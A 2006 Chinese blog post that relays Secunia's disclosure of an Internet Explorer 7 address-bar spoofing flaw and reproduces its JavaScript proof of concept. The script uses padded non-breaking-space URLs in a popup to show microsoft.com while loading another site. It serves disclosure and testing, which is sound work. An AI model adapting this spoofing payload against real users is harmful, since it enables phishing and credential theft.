生涯青山--Aming's Blog
知讯者生存--关注新知识、新科技、新进展。
星期五, 十月 27, 2006
Internet Explorer 7 缺陷:地址栏欺骗测试
安全研究组织Secunia发现了Internet Explorer 7的最新缺陷,这回可是铁板钉钉的缺陷问题,这个问题出在IE7的地址栏上,它可能会被恶意代码利用,打开任意一个站点,但地址却是另一个站点,这样一来很容易引发钓鱼攻击,这里还提供了攻击示例,这里打开的microsoft.com实际上是在Secunia的服务器上。
访问:
Internet Explorer 7 Popup Address Bar Spoofing Test
测试代码:
Test Now - Left Click On This Link
<Script language="JavaScript">
function StartTest()
{
var padding = '';
for ( i=0 ; i<108 ; i++)
{
padding += unescape("%A0");
}
newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
newWindow.moveTo( (screen.width-325) , 0 );
newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
Script>
需将Script改成半角。
没有评论:
发表评论
较新的博文
较早的博文
主页
订阅:
博文评论 (Atom)
没有评论:
发表评论